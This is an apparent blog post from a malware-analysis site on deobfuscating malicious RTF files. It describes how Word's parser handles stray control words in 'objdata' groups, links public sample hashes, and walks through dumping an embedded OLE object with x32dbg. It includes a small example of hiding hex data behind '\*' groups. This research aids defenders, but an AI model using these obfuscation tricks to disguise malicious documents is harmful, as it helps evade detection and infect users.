tag:blogger.com,1999:blog-2501094723736477192024-03-05T21:11:13.639+00:00Malware Analysis: The Final Frontier<p align="center">"Knowledge is power. Knowledge shared is power multiplied." - Robert Noyce</p>Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.comBlogger46125tag:blogger.com,1999:blog-250109472373647719.post-66407447283163469482018-11-19T19:39:00.000+00:002018-11-19T19:42:04.747+00:00Deobfuscation tips: RTF files<style>
* {
font-family: 'Exo 2', sans-serif;
}
h4, h5, h6 {
color: rgb(11, 83, 148);
font-family: 'Roboto Slab', serif;
}
ul {
list-style: none;
}
.consumer {
color:lime;
font-weight:700;
}
.auto-width {
width: auto;
height: 400px;
margin: auto;
}
</style>
<script>
function controlWordSearch() {
var input, filter, table, tr, th, i;
input = document.getElementById("controlWordInput");
filter = input.value.toUpperCase().split('').filter(character => /[A-Za-z]/.test(character)).join('');
table = document.getElementById("controlWordTable");
tr = table.getElementsByTagName("tr");
if (/[A-Za-z]/.test(filter)) {
for (i = 0; i < tr.length; i++) {
th = tr[i].getElementsByTagName("th")[0];
if (th) {
if (th.innerHTML.toUpperCase().indexOf(filter) > -1) {
tr[i].style.display = "";
} else {
tr[i].style.display = "none";
}
}
}
}
else if (filter.length === 0) {
for (i = 0; i < tr.length; i++) {
th = tr[i].getElementsByTagName("th")[0];
if (th) {
tr[i].style.display = "";
}
}
}
else {
document.getElementById("controlWordInput").value = "";
}
}
function animationToggle(animationID) {
var animation, parentButton;
animation = document.getElementById(animationID);
parentButton = document.getElementById(`${animationID}Button`);
if (animation.style.display === "none") {
animation.style.display = "";
parentButton.innerText = "Hide";
}
else {
animation.style.display = "none";
parentButton.innerText = "Show";
}
}
</script>
<div class="container">
<div class="container" id="intro">
<div>
<h4>Introduction</h4>
</div>
<div>
This blog post outlines the findings I came across of when analysing different types of data obfuscation found
in malicious RTF files. The research included performing static and dynamic analysis of publicly available
samples used for delivering the commodity malware. The main goal was to understand how native RTF parser is
treating unexpected data in control word groups, such as 'objdata'.
</div>
</div>
<hr>
<div class="container" id="executive">
<div>
<h4>Executive Summary</h4>
</div>
<div>
Information in this blog post is intended for cybersecurity researchers and specialists developing RTF file
parsers. The research is based on the work already performed by other cybersecurity researchers and firms.
Its goal is to put some additional content on their work to enable the audience not so much familiar with
this area to better understand it.
</div>
<br>
<div>
As a part of this research, over 2000 experiments were performed. Each experiment aimed at establishing Microsoft native RTF
parser behavior when processing unexpected data. Knowing this behavior allows for reconstruction of the data
otherwise obfuscated for the purpose of hiding the malicious content and impeding the static signature based
detection.
</div>
</div>
<hr>
<div class="container" id="analysis">
<div>
<h4>Analysis</h4>
</div>
<div style="font-size: 0.75rem">
<b>Disclaimer</b>: The results observed might be specific to the test environment used. The same results can be
achieved by using other open/close source tools.
</div>
<br>
<div id="analysisObfuscation">
<h5>Obfuscation / Obfuscation Types</h5>
</div>
<div>
RTF files allow for a broad range of data obfuscation techniques. FireEye Threat Research group and Kaspersky
Labs explained most common techniques in their blog posts <a href="https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html">here</a>
and <a href="https://securelist.com/disappearing-bytes/84017/">here</a>.
Where almost all of the techniques highlighted in the reports are still being used by the threat actors, there
were a few additions in the last 2.5 years. See the carousel below for some of the most common obfuscation types:
</div>
<br>
<div class="row justify-content-center">
<div class="col-10">
<div id="obfuscationTypesCarousel" class="carousel slide" data-ride="carousel">
<div class="carousel-inner">
<div class="carousel-item active">
<img class="d-block auto-width" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX8gMnD8BRQVQEduhfHyeYq9p36eYc-L8O76GrD6H0fBHGegbzuOr9Dentfec4qZcrxg1_zW8jbywNbDpFm_X2zaG-EMDNU7NKjb2x4kzGEGxQG6Lb-XMhB59lnq16KiMuh8ClNx_0u6AS/s1600/Screenshot+from+2018-11-03+15-41-33_small.png"
alt="First slide">
</div>
<div class="carousel-item">
<img class="d-block auto-width" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2nekktg0o0AyoiXW5kr7LJkaGnEieMZYW3Z2Uwqo83_2mDkQ4vFIHoe9TtfVSJw4ZAjJ6R0BSS-PAYvOMX6C3bw7844nCsEIvDUAq6h51YGPPzADSgjAbyJaBrFxS6Iyh5VeblrQVsOKK/s1600/Screenshot+from+2018-11-03+15-46-21_small.png"
alt="Second slide">
</div>
<div class="carousel-item">
<img class="d-block auto-width" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRHqOWY-PoIDsreDNyZ3CFj3DHE03XD4tF0iOafomtERF5_PQy3lrdXdU-YPMVAwknEkBVQzT-y3Xj72jFe5HMYWioFcZfg_zRG1SJRgk8EUHcIXeT-ObEXT-0UnfsNXgRE0ibtcwICLF4/s1600/Screenshot+from+2018-11-03+15-48-08_small.png"
alt="Third slide">
</div>
<div class="carousel-item">
<img class="d-block auto-width" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPsYKhQFlxfvDf-jo5UdofaqmXUfclNncEEFNVOcrINtA_n0B_1Nw560ByhzMeU6PMofztCZNPhwasnFOtWVFKo-5vnu7lhpCaANUsN8YMgOtC0S4kDoe73ufd_ba2RGZF7RhZRgeC_lS9/s1600/Screenshot+from+2018-11-03+15-51-42_small.png"
alt="Fourth slide">
</div>
<div class="carousel-item">
<img class="d-block auto-width" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRc0Jk0K8CFZLW4rb8R6c6KXqCGQSibvqb34SX2faegJbLn1Bx4du0R_kcxUv4dlCGDLPcqC9NkzoIN_eYj5hc_Y1ZFs-3emcYYBumYg18EIEa8d3yX8pygaVe5fOydoqC9pD23xf_icLq/s1600/Screenshot+from+2018-11-03+16-15-39_small.png"
alt="Fifth slide">
</div>
<div class="carousel-item">
<img class="d-block auto-width" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhYVkSbmjPY-hLXZqaKb9NtGcDXoemrntVRKt6IhUAvFH6wTA9zb8n3XKq84nJaZMnLNXvYSi8IwyeuaPBeH3netRK_M3ukIlfUxHVEG9yeiMvSWRZbePPMwQMb2Mp82IXKehRQTdqMe5D/s1600/Screenshot+from+2018-11-03+16-19-37_small.png"
alt="Sixth slide">
</div>
<div class="carousel-item">
<img class="d-block auto-width" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDDm9JnRAcEQ8uk4Zbac5wFXcSyEoiVx-mJbXGmPBCDZvh_LY6bNgO9vppt9bNns7MLIWuJn5WRbrvV8B23VjGv8qsrsiELjXObd5dzjrrHnaK14UxBgvySEJ2S_hSPdR_QTYFSYJJ9L8Z/s1600/Screenshot+from+2018-11-03+16-20-18_small.png"
alt="Seventh slide">
</div>
</div>
<a class="carousel-control-prev" href="#obfuscationTypesCarousel" role="button" data-slide="prev">
<span class="carousel-control-prev-icon" aria-hidden="true"></span>
<span class="sr-only">Previous</span>
</a>
<a class="carousel-control-next" href="#obfuscationTypesCarousel" role="button" data-slide="next">
<span class="carousel-control-next-icon" aria-hidden="true"></span>
<span class="sr-only">Next</span>
</a>
</div>
</div>
</div>
<br>
<div>
The techniques shown above can be found in the following malware samples:
<div class="row">
<div class="col-6">
<ul class="list-group list-group-flush">
<li class="list-group-item"><a href="https://www.virustotal.com/#/file/f31fb0969f07cb8a228165b212d1ca04527badbcff5503f8e60497d995e606e4/detection">37073b8fa1b9ab1863d47de89f3d3bd5</a></li>
<li class="list-group-item"><a href="https://www.virustotal.com/#/file/cc42a36b5b17c94d40cb59f792c6e7100cf771cccb296b4057f1e442d34f8de3/detection">35cbfbc04fac3e2f5c5699fd16c898f6</a></li>
<li class="list-group-item"><a href="https://www.virustotal.com/#/file/946e3acbb3c1849e86dd057cf07407d3ca4cf3f73fb7428ff51ca4e4ecb07f74/detection">bb006ed910b9dacfc8bb807873e82a5e</a></li>
<li class="list-group-item"><a href="https://www.virustotal.com/#/file/5da8e9c7642038d788123335f3531dd9d146d9ecf91450843c8ca229af5a0a3b/detection">8efab288196e466bf6b9a5dc4761e499</a></li>
<li class="list-group-item"><a href="https://www.virustotal.com/#/file/8e289a91a13c7d4c8f4f8ef5586dc3f0012ed71fd73d5d3240ecd5ed4e3d6ca9/detection">ade12ff6ac7541c5a55de89fbb57cec9</a></li>
<li class="list-group-item"><a href="https://www.virustotal.com/#/file/3a5de235ecb2c686c245277faf75b2393a23369d466880a67545bd3b29a1534c/detection">04399af30c10b3899dedbbc16b689c56</a></li>
</ul>
</div>
</div>
</div>
<br>
<div>
Having such a variety of obfuscation techniques, makes it difficult to perform static analysis of the files
generated using those techniques. To be able to manually reconstruct the obfuscated objects, one would require to
know how RTF reader 'state machine' (<a href="https://www.microsoft.com/en-ie/download/details.aspx?id=10725">Rich
Text Format (RTF) Specification, Version 1.9.1 (page 212)</a>) will interpreter the data it reads.
</div>
<br>
<div>
The most trickiest part is the destination control word - '\*'. According to RTF Specification
Document, it serves the following purpose - '<b>Marks a destination whose text should be ignored if not
understood by the RTF reader.</b>' It would be great if it was just that, but apparently its behavior
is a bit trickier due to the way it affects RTF reader internal state. Here is another comment on this
control
word from the specification document advising on things to consider when building an RTF parser.
</div>
<br>
<div>
<blockquote class="blockquote">
<p class="mb-0">Always understand \*</p>
<p class="mb-0">One of the most important things an RTF reader can do is to understand the \* control. This
control introduces a destination that <span style="color: red; font-weight: 700">is not part of the document</span>.
It tells the RTF reader that <span style="color: red; font-weight: 700">if the reader does not understand</span>
the next control word, then <span style="color: red; font-weight: 700">it should skip the
entire enclosing group</span>.</p>
</blockquote>
</div>
<div>
Somewhat straight forward, but what happens when the RTF reader DOES understand the control word? How the RTF
reader state is going to be affected by the data contained in the destination group?
</div>
<br>
<div>
This blog post will attempt to shed some light on this very subject. The goal of my research was to establish the
Microsoft native RTF parser behavior when it encounters 'extra' groups or control words in 'objdata'
groups. Having done some OSINT research, I came to understanding that it's difficult to identify with 100%
certainty how a given unexpected data will be processed. It all boils down to the RTF control words and their
ability to consume (or not) the data right after them.
</div>
<br>
<div>
According to RTF specification document, there are 1814 control words. They are split into following 5
groups:
</div>
<div>
<ul>
<li>Destinations</li>
<li>Flags</li>
<li>Symbols</li>
<li>Toggles</li>
<li>Values</li>
</ul>
</div>
<div>
Most commonly used in the 'objdata' group obfuscation are: destinations, symbols and flags. What adds
an extra bit of complexity is the '\*' control word. As will be shown later, the control words data
consumption behavior is different whether it's used inside a destination group or not.
</div>
<br>
<div>
The approach I've taken to identify the control words behavior is quite simple. I took all the destination and
flags control words and generated simple RTF files with them being inside a destination group and not. See below
for an example:
</div>
<br>
<div>
<div class="text-center">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2ROLU4yCwAFoevLgGBx6GMUV4ehLYrTB0RClFLMFj2tdbQYgD-rmQUVUc3QJy9REfCJXwyccd7Wp6N-4BQB07NbqbU_61QXs75fcpuIpvEARCbhLHIT29mU7UkYsQHb1iRpq1MMXzqXm8/s1600/Screenshot+from+2018-11-11+15-57-06.png">
<img class="rounded" style="width: 40%; padding-right: 10px" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2ROLU4yCwAFoevLgGBx6GMUV4ehLYrTB0RClFLMFj2tdbQYgD-rmQUVUc3QJy9REfCJXwyccd7Wp6N-4BQB07NbqbU_61QXs75fcpuIpvEARCbhLHIT29mU7UkYsQHb1iRpq1MMXzqXm8/s1600/Screenshot+from+2018-11-11+15-57-06.png" />
</a>
<span>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpb0YjvLezk0uedVRE0Y4gQVpKY94I-ZR2OQ83n9Zt7n8BqIE6jCE2c2FAk0DMe-jmlCHDpgem5hof3ksJs3MyrQ5PTjjfPBCB41jcs2PQCrRMM3wprNfp0h3ZbfHsnqNRkaW2DNXCW3VA/s1600/Screenshot+from+2018-11-11+15-57-38.png">
<img class="rounded" style="width: 40%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpb0YjvLezk0uedVRE0Y4gQVpKY94I-ZR2OQ83n9Zt7n8BqIE6jCE2c2FAk0DMe-jmlCHDpgem5hof3ksJs3MyrQ5PTjjfPBCB41jcs2PQCrRMM3wprNfp0h3ZbfHsnqNRkaW2DNXCW3VA/s1600/Screenshot+from+2018-11-11+15-57-38.png" />
</a>
</span>
</div>
</div>
<br>
<div>
All in all, I ended up with 2358 RTF files. Fair question raises, how on Earth you're going to analyse 2358
files? On Earth, the answer is really simple - manually opening each one of them and witnessing the result with
your own eyes.
</div>
<br>
<div>
No matter how sad of a person some people might think I am after opening 2358 RTF files with Microsoft Office
Word, I recorded the results and built a searchable table (see Appendix section) to help me find a control word
behavior depending on its group location. Click on the 'Show' button below to see an example of a
search:
</div>
<br>
<div>
<button id="animation1Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation1')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation1" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHTVt1EuL0oOzF5txmbKoYTGak2BtUK8nPdoEFHAJKJv9I50j-Tu1G1kv0WGm6QS-umRa6SnRsgjSdYSqatd1KVOO-XHCzJd5YBCufSa-ZdIwW5X_ijNqBsKyILdFFHWtyYOzJiAxuL1PD/s1600/Peek+2018-11-11+16-56.gif">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHTVt1EuL0oOzF5txmbKoYTGak2BtUK8nPdoEFHAJKJv9I50j-Tu1G1kv0WGm6QS-umRa6SnRsgjSdYSqatd1KVOO-XHCzJd5YBCufSa-ZdIwW5X_ijNqBsKyILdFFHWtyYOzJiAxuL1PD/s1600/Peek+2018-11-11+16-56.gif" />
</a>
</div>
</div>
<br>
<div>
<span class="consumer">Consumes data </span> means that any data following the control word will be consumed by
it and will NOT be present in the final 'objdata' group data. Following the example of a control word
given above, see how it affects the 'objdata' group data below:
</div>
<br>
<div class="row" style="font-size: 0.7rem">
<div class="col-6 text-center">
<div>{\*\objdata 010500000200000008000000{<span style="color:red; font-weight: 700;">\*</span>\mmaxdist <span
style="color:red; font-weight: 700;">5061636b616765000</span>} 000000000}</div>
<div>⇓</div>
<div>{\*\objdata 010500000200000008000000000000000}</div>
</div>
<div class="col-6 text-center">
<div>{\*\objdata 010500000200000008000000{\mmaxdist <span style="color:red; font-weight: 700;">5061636b616765000</span>}
000000000}</div>
<div>⇓</div>
<div>{\*\objdata 010500000200000008000000<span style="color:red; font-weight: 700;">5061636b616765000</span>000000000}</div>
</div>
</div>
<br>
<div>
The table might come handy when building RTF parsing tools or peeling off some simple obfuscation, but when
things become a bit complicated we need a better approach. The section below describes a method that proved to
work with any obfuscation types.
</div>
<br>
<div id="analysisSilverBullet">
<h5>The Silver Bullet</h5>
</div>
<div style="font-size: 0.75rem">
<b><u>NOTE</u></b>: <span style="color:red">It is strongly recommended that the following procedures to be
performed in an environment you may allow to be compromised.</span>
</div>
<br>
<div>
FireEye report mentioned previously discusses a 'silver bullet' approach to
deobfuscating OLE objects embedded in RTF files. The gist of it is to intercept the call to
'OleConvertOLESTREAMToIStorage' function. The interception will allow to extract the reconstructed OLE
object before it's passed for further processing. The object will be fully deobfuscated as per Microsoft's
native RTF parser logic.
</div>
<br>
<div>
The section below is a walk-through for this method using <a href="https://x64dbg.com/#start">x32dbg</a>.
Should you be manually analysing an obfuscated RTF file or building an automation tools, the procedure below
might come helpful.
</div>
<br>
<div>
<h6>Test Environment</h6>
</div>
<div>
The following test environment was used:
</div>
<div>
<ul>
<li><b>Virtualization</b>: Virtual Box (5.2.10)</li>
<li><b>Guest OS</b>: Windows 7 Professional SP1</li>
<li><b>Host Application</b>: Microsoft Office 2007 (12.0.4518.1014)</li>
<li><b>Debugger</b>: x32dbg (build Aug 12 2018, 23:03:57)</li>
<li><b>Text Editor</b>: Notepad++ (v7.5.9 64-bit)</li>
</ul>
</div>
<div>
<h6>Pre-debugging Steps</h6>
</div>
<div>
Before opening a test RTF sample in Microsoft Word, the following steps must be completed:
</div>
<div>
<ol>
<li>start Microsoft Word application</li>
<li>start x32dbg application</li>
<li>in x32dbg, go <b>File</b> -> <b>Attach</b></li>
<li>in the 'Attach' window, select 'WINWORD'</li>
<li>click <b>Attach</b> button</li>
<li>press <b>F9</b> or click <b>Run</b> button in the top tool bar</li>
</ol>
</div>
<div>
Click 'Show' button below to see steps 3 - 6.
</div>
<br>
<div>
<button id="animation2Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation2')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation2" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_wip5lXOGZhhISR_1p7fpZLk5VB8oVPXSXdpqz8uuAEQvthkbZwaS3xnu_qSUtEIQOupKcRf4LE4D74fJAEwS3LbQ8k97veuovbtgis43ZCPPXl27JgcMMA_mfniFkvkuzfyAl_yQObGV/s1600/Peek+2018-11-11+13-24_edited.gif">
<img class="rounded" style="width: 800px" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_wip5lXOGZhhISR_1p7fpZLk5VB8oVPXSXdpqz8uuAEQvthkbZwaS3xnu_qSUtEIQOupKcRf4LE4D74fJAEwS3LbQ8k97veuovbtgis43ZCPPXl27JgcMMA_mfniFkvkuzfyAl_yQObGV/s1600/Peek+2018-11-11+13-24_edited.gif" />
</a>
</div>
</div>
<br>
<div>
<h6>Debugging</h6>
</div>
<div style="font-size: 0.75rem">
<b><u>NOTE</u></b>: The following steps are based on this sample <a href="https://www.virustotal.com/#/file/5da8e9c7642038d788123335f3531dd9d146d9ecf91450843c8ca229af5a0a3b/detection">bcde46711f4b7c1b7cc0b2e490748472c04fdc74</a>
</div>
<br>
<div>
Fair amount of obfuscation techniques is used in this test sample. It'll be rather challenging to reconstruct
the embedded OLE object manually. Before opening the sample with Microsoft Word, we need to setup a
breakpoint on 'OleConvertOLESTREAMToIStorage' function call. The steps below describe one way of doing
it:
</div>
<br>
<div>
<ol>
<li>in x32dbg, go to <b>Symbols</b> tab</li>
<li>click anywhere in the left pane and start typing <b>ole32.dll</b></li>
<li>click anywhere in the right pane and start typing <b>OleConvertOLESTREAMToIStorage</b></li>
<li>once the view is filtered, find reference to <b>OleConvertOLESTREAMToIStorage</b> and click on it</li>
<li>press <b>F2</b> or right click on it and select <b>Toggle Breakpoint</b></li>
<li>switch to <b>Breakpoints</b> tab and make sure there is an entry for <b>OleConvertOLESTREAMToIStorage</b>
function call</li>
</ol>
</div>
<div>
Click 'Show' button below to see steps in action.
</div>
<br>
<div>
<button id="animation3Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation3')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation3" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHt9rVs2YBl_V-5cISy8MmMfW01SMbNvOmUFVvq0fmJ-AWIhEVEHV8-lerIJEjG4v9o5QdAFlvd4Ln86izppG6LwU-6TAPBGIKMqgu4ft81GcgKHGAHf4ISr2hZ0DvLYlFsOvPBZbMc-x8/s1600/Peek+2018-11-11+18-46.gif">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHt9rVs2YBl_V-5cISy8MmMfW01SMbNvOmUFVvq0fmJ-AWIhEVEHV8-lerIJEjG4v9o5QdAFlvd4Ln86izppG6LwU-6TAPBGIKMqgu4ft81GcgKHGAHf4ISr2hZ0DvLYlFsOvPBZbMc-x8/s1600/Peek+2018-11-11+18-46.gif" />
</a>
</div>
</div>
<br>
<div>
Now we're ready to open the test sample with Microsoft Word application and intercept the call to
'OleConvertOLESTREAMToIStorage' function. This will allow us to extract the embedded OLE object
directly from the memory after it was assembled by Microsoft's native RTF parser. Follow the steps below:
</div>
<br>
<div>
<ol>
<li>in Microsoft Word, click on <b>Office Button</b> and select <b>Open</b></li>
<li>navigate to the location where the sample is stored</li>
<li>double-click on the file or select the file and click <b>Open</b> button</li>
<li>switch to x32dbg</li>
</ol>
</div>
<br>
<div>
At this stage we have loaded test sample into Microsoft Word and stopped its execution at
'OleConvertOLESTREAMToIStorage' function call. Our next step will be finding the assembled OLE object
in the memory. Follow the steps below:
</div>
<br>
<div>
<ol>
<li>in x32dbg, right-click on the second line from the top in the stack pane</li>
<li>select <b>Follow DWORD in Dump</b></li>
<li>select the DWORD value(4 bytes) in the third column of the first line in <b>Dump 1</b> tab</li>
<li>right-click the selected value and expand <b>Follow DWORD in Dump</b> menu</li>
<li>select <b>Dump 2</b> option</li>
<li>select the DWORD value(4 bytes) in the first column of the first line in <b>Dump 2</b> tab</li>
<li>right-click the selected value and click <b>Follow DWORD in Current Dump</b> option</li>
</ol>
</div>
<br>
<div>
<b>Dump 2</b> tab is now showing the embedded OLE object in the memory after it has been parsed by the native RTF
parser. It's now fully assembled and all the data obfuscation is removed. Before we can extract the object
from the memory, we need to take a note of the memory address where it's located and its length.
</div>
<br>
<div>
The address is currently being shown on the first line in <b>Dump 2</b> tab. The length value is located next to
the value we selected first in <b>Dump 1</b> tab. Switch to 'Dump 1' tab and take a note of the value
in the fourth column of the first line. Our next step is to carve it out of the memory and save it to the disk.
Follow the steps below to do so:
</div>
<br>
<div>
<ol>
<li>click on <b>Command</b> text entry field (located at the bottom of x32dbg window)</li>
<li>type <b>savedata :memdump:, <i>mem_addr</i>, <i>length</i></b></li>
<li>press <b>Enter</b> key</li>
</ol>
</div>
<br>
<div>
The OLE object is now saved in <b><i>X64DBG_INSTALL_PATH</i>\release\x32\memdumps</b> folder.
</div>
<br>
<div>
Click 'Show' button below to see all those steps in action.
</div>
<br>
<div>
<button id="animation4Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation4')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation4" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCWOup1tL7-XuFmJK1wTBQJw1l81h2T7otjKyv85-GImDwntco4fzOXp0SIGW2aplYRij406F1SHDzb8ryLaPYGmUrtb3OEJbu-_UwXan3yTbmuvUhIE7_z7yp-qcDs2znAEjx7RQ0_9yN/s1600/Peek+2018-11-11+20-20.gif">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCWOup1tL7-XuFmJK1wTBQJw1l81h2T7otjKyv85-GImDwntco4fzOXp0SIGW2aplYRij406F1SHDzb8ryLaPYGmUrtb3OEJbu-_UwXan3yTbmuvUhIE7_z7yp-qcDs2znAEjx7RQ0_9yN/s1600/Peek+2018-11-11+20-20.gif" />
</a>
</div>
</div>
<br>
<div>
If RTF file contains multiple embedded OLE objects, pressing <b>F9</b> will continue the Microsoft Word execution
until the next OLE object is passed to 'OleConvertOLESTREAMToIStorage' function. At this point tough,
there is no guarantee your test machine will not be infected. Proceed with caution!
</div>
<br>
<div>
<h6>Aftermath</h6>
</div>
<div>
In this section we will review the results using some of the data obfuscation examples found in the original RTF
sample file. If you wish to follow along, open it in a text editor. I'll be using 'Notepad++' and
referencing pieces of data by their line positions in the file. You will also need a hex viewer/editor of your
choice.
</div>
<br>
<div>
First, let's describe the 'objdata' group that starts on line 67.
</div>
<br>
<div>
There are 2 groups that follow it right after its declaration - line 71. Each group contains 3 control words
followed by a piece of data.
</div>
<br>
<div>
<button id="animation5Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation5')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation5" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_fhJppJ4On0Osdls2lFdUiDddsyMXbwwbvm0oE_dEkYp1WZPTo8HlPzbJKTSFr1K6OsK1G4cwkWodRgApTCtlORq-QGbVoNy1PYnAhA_yUdAArgJkgPjoCET-hw6WNjAFHYsUEIRdQRZa/s1600/Screenshot+from+2018-11-12+22-29-25.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_fhJppJ4On0Osdls2lFdUiDddsyMXbwwbvm0oE_dEkYp1WZPTo8HlPzbJKTSFr1K6OsK1G4cwkWodRgApTCtlORq-QGbVoNy1PYnAhA_yUdAArgJkgPjoCET-hw6WNjAFHYsUEIRdQRZa/s1600/Screenshot+from+2018-11-12+22-29-25.png" />
</a>
</div>
</div>
<div>
Sequence of <b>\'</b> special characters begins on line 77. Their general purpose is to represent a HEX
value, based on the specified character set, but as can be seen in the given examples, the 'HEX'
characters do not conform to hex value representation format.
</div>
<br>
<div>
<button id="animation6Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation6')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation6" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpjF63NrNAV_8GRwaAg_1KiVCT4Go5SZDP71y7ZyVhJsMhcKSrplLJil4AwEaXmh-rZxdBnvmtifhQ0bLjRDDtSxaHgaXvXcjfvC8n26mrpwTKZlcKcdsa8CVBu-hkr9GE2NQSp2v4Bx5f/s1600/Screenshot+from+2018-11-12+22-35-09.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpjF63NrNAV_8GRwaAg_1KiVCT4Go5SZDP71y7ZyVhJsMhcKSrplLJil4AwEaXmh-rZxdBnvmtifhQ0bLjRDDtSxaHgaXvXcjfvC8n26mrpwTKZlcKcdsa8CVBu-hkr9GE2NQSp2v4Bx5f/s1600/Screenshot+from+2018-11-12+22-35-09.png" />
</a>
</div>
</div>
<div>
Plain text data begins on line 80 and followed by another special characters obfuscation starting on line 83.
</div>
<br>
<div>
<button id="animation7Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation7')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation7" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyo25X0ZvVuai8-rb5gVj-RsMdePwjRnnEUw4_Qgh9ELitIn6BHdK6IKfkTjhStwzUrQ357_SxpIYc1gpG1UZVl09QJh-jOknNolWSdfEB48pokbNGUK7wSuKAXUQzI6mLwPe5iZnpoIV_/s1600/Screenshot+from+2018-11-12+22-39-06.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyo25X0ZvVuai8-rb5gVj-RsMdePwjRnnEUw4_Qgh9ELitIn6BHdK6IKfkTjhStwzUrQ357_SxpIYc1gpG1UZVl09QJh-jOknNolWSdfEB48pokbNGUK7wSuKAXUQzI6mLwPe5iZnpoIV_/s1600/Screenshot+from+2018-11-12+22-39-06.png" />
</a>
</div>
</div>
<div>
Interesting group at line 95 contains a non-printable character followed by a hex string. This group also
preceded by destination control word - '\*'.
</div>
<br>
<div>
<button id="animation8Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation8')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation8" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_fh5hVP8l4Ed-jCWoUvKOvl3mjumhpENINHfFEt_PaUk9xRhBYKK5vyx0iKoYVi9GApcJfqH_BXCeL8fVt7cSjjnHMARkf0g7vAKXlvXg_Dv5-_895GUN2b0PMkxOn8-as8QwochSWUs/s1600/Screenshot+from+2018-11-12+22-42-15.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_fh5hVP8l4Ed-jCWoUvKOvl3mjumhpENINHfFEt_PaUk9xRhBYKK5vyx0iKoYVi9GApcJfqH_BXCeL8fVt7cSjjnHMARkf0g7vAKXlvXg_Dv5-_895GUN2b0PMkxOn8-as8QwochSWUs/s1600/Screenshot+from+2018-11-12+22-42-15.png" />
</a>
</div>
</div>
<div>
Another group (line 100) containing 2 control words.
</div>
<br>
<div>
<button id="animation9Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation9')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation9" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjORcnX3SQEi3E8Gk_AS69zTOiMx91Pa1FrMrPiP7rgqu16_h1uq1Q3CAXM552L0UhDVeV9Nu61ASl2NWs7XN-4b7Xcl-KYIAX-f0GdRZOje8iuRRCZJaRTTYGI-xWLsz-m4aYLZaMzBipx/s1600/Screenshot+from+2018-11-12+22-45-31.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjORcnX3SQEi3E8Gk_AS69zTOiMx91Pa1FrMrPiP7rgqu16_h1uq1Q3CAXM552L0UhDVeV9Nu61ASl2NWs7XN-4b7Xcl-KYIAX-f0GdRZOje8iuRRCZJaRTTYGI-xWLsz-m4aYLZaMzBipx/s1600/Screenshot+from+2018-11-12+22-45-31.png" />
</a>
</div>
</div>
<div>
Sequence of escaped expressions begins at line 103.
</div>
<br>
<div>
<button id="animation10Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation10')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation10" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeunUpLwqG2N9u2KkXGtj4W9DVwmuW8vT85dPRvk9dYOhzxbXQASlzdAEZtbs3FXU9BwX6KBp3597FIojmwAwkYQLNhKzqVuTpKZQ4gVbRV5mcXzJRiFcffEwePNfiitlRr8CryTDbNDUQ/s1600/Screenshot+from+2018-11-12+22-48-56.png">
